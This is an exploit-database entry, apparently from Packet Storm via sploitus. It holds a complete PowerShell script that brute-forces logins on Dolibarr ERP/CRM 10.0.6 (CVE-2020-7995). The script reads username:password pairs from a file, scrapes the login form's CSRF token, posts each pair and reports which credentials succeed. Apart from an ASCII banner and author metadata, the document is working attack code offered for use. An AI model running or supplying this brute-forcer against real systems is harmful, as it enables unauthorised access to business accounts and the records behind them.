Share
## https://sploitus.com/exploit?id=PACKETSTORM:163541
# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force  
# Date:2020-01-18  
# Exploit Author: Creamy Chicken Soup  
# Vendor Homepage: https://www.dolibarr.org  
# Software Link: https://sourceforge.net/projects/dolibarr/  
# Version: 10.0.6  
# Tested on: Windows 10 - 64bit  
# CVE: CVE-2020-7995  
  
function brute($url,$username,$passwd){  
try{  
$WebResponse = Invoke-WebRequest $url  
$a=$WebResponse.Forms.fields  
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}  
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields  
if($WebResponse1.Forms.Id -ne "login"){  
Write-Host "username password is match"  
Write-Warning "user: $username ,passwoed: $passwd"  
return $true  
}  
}catch{  
Write-Warning "Something Wrong!"  
}  
}  
  
function fileinput($filepath,$url){  
try{  
Write-Host "Target: $url"  
$fp=Get-Content -Path $filepath  
foreach($line in $fp){  
$s=$line -split ':'  
$username=$s[0]  
$passwd=$s[1]  
Write-Host "[+] Check $username : $passwd"  
$bf=brute $url $username $passwd  
if($bf -eq $True){  
break  
}  
}  
}catch{  
Write-Warning "File is error"  
}  
}  
  
$textart=@'  
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____   
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\  
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|  
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/  
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/   
  
'@  
  
Write-Host $textart  
Write-Host @'  
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability  
Date: 2020-01-18  
Exploit Author: CreamyChickenSoup  
Vendor Homepage: https://www.dolibarr.org  
Version: 10.0.6  
CVE: CVE-2020-7995  
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home  
Twitter: @creamychickens1  
cve submited:Tufan Gungor  
'@  
$url=Read-Host "Enter Url:"  
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"  
fileinput $filepath $url